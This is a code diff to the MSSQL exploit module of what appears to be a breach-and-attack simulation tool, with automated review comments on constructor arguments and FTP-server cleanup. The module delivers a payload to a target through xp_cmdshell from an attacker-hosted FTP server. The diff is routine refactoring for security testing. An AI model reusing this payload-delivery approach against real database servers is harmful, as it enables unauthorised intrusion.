diff --git a/infection_monkey/exploit/mssqlexec.py b/infection_monkey/exploit/mssqlexec.py
index 0fae16fe4..6f920a073 100644
--- a/infection_monkey/exploit/mssqlexec.py
+++ b/infection_monkey/exploit/mssqlexec.py
@@ -51,7 +51,7 @@ class MSSQLExploiter(HostExploiter):
 True or False depends on process success
 """
- chosen_attack = self.attacks_list[0](payload, cursor)
+ chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)
 if chosen_attack.send_payload():
 LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
diff --git a/infection_monkey/exploit/mssqlexec_utils.py b/infection_monkey/exploit/mssqlexec_utils.py
index 13509f0f0..c3666a340 100644
--- a/infection_monkey/exploit/mssqlexec_utils.py
+++ b/infection_monkey/exploit/mssqlexec_utils.py
@@ -5,6 +5,7 @@ import socket
 import pymssql
+from exploit.tools import get_interface_to_target
 from pyftpdlib.authorizers import DummyAuthorizer
 from pyftpdlib.handlers import FTPHandler
 from pyftpdlib.servers import FTPServer
@@ -22,7 +23,7 @@ FTP_WORKING_DIR = '.'
 LOG = logging.getLogger(__name__)
-class FTP:
+class FTP(object):
 """Configures and establish an FTP server with default details.
@@ -103,11 +104,11 @@ class CmdShellAttack(AttackHost):
 """
- def __init__(self, payload_path, cursor):
+ def __init__(self, payload_path, cursor, dst_ip_address):
 super(CmdShellAttack, self).__init__(payload_path)
 self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
 self.cursor = cursor
- self.attacker_ip = self.__find_own_ip()
+ self.attacker_ip = get_interface_to_target(dst_ip_address)
 def send_payload(self):
 """
@@ -134,7 +135,7 @@ class CmdShellAttack(AttackHost):
 # Running the cmd on remote host
 for cmd in shellcmds:
 self.cursor.execute(cmd)
- except Exception, e:
+ except Exception as e:
 LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
 self.ftp_server_p.terminate()
 return False
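Review bot: The call `self.attacks_list[0](payload, cursor, self.host.ip_addr)` passes the target address positionally, so every class that can be placed in `attacks_list` must now accept a third constructor argument. Only `CmdShellAttack.__init__` is updated in this commit, and the contents of the list are not visible here. Passing it by keyword, `self.attacks_list[0](payload, cursor, dst_ip_address=self.host.ip_addr)`, would make the new contract explicit at the call site and fail loudly on a class that was not updated. The enclosing method starts outside the hunk.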
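Review bot: In `CmdShellAttack.__init__`, `get_interface_to_target(dst_ip_address)` runs after `self.__init_ftp_server()` has already tried to start the FTP server process, and its result is stored in `self.attacker_ip` without a check. If the lookup raises or returns no usable address (its failure behaviour is not visible in this diff), the constructor leaves a listening FTP process behind with nothing to terminate it. Resolving the address first and starting the server only once it is known avoids that. The new parameter also needs a line in the class docstring, for example `dst_ip_address (string): IP address of the target host, used to select the local interface`. If `__find_own_ip` has no other caller it is now dead code and can be removed.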
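Review bot: The handler in `send_payload` calls `self.ftp_server_p.terminate()` unconditionally, but the last hunk of this file shows what appears to be `__init_ftp_server` returning `None, None` when the server could not be started. In that case this line raises `AttributeError` from inside the `except` block and hides the original error; guard it with `if self.ftp_server_p is not None: self.ftp_server_p.terminate()`. The name bound by `except Exception as e:` is unused because the log call relies on `exc_info=True`, so `except Exception:` is enough here and in the handler of the final hunk. The `try` this handler belongs to starts outside the hunk.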
@@ -195,7 +196,7 @@ class CmdShellAttack(AttackHost):
 p.start()
 LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
 return ftp_s, p
- except Exception, e:
+ except Exception as e:
 LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
 return None, None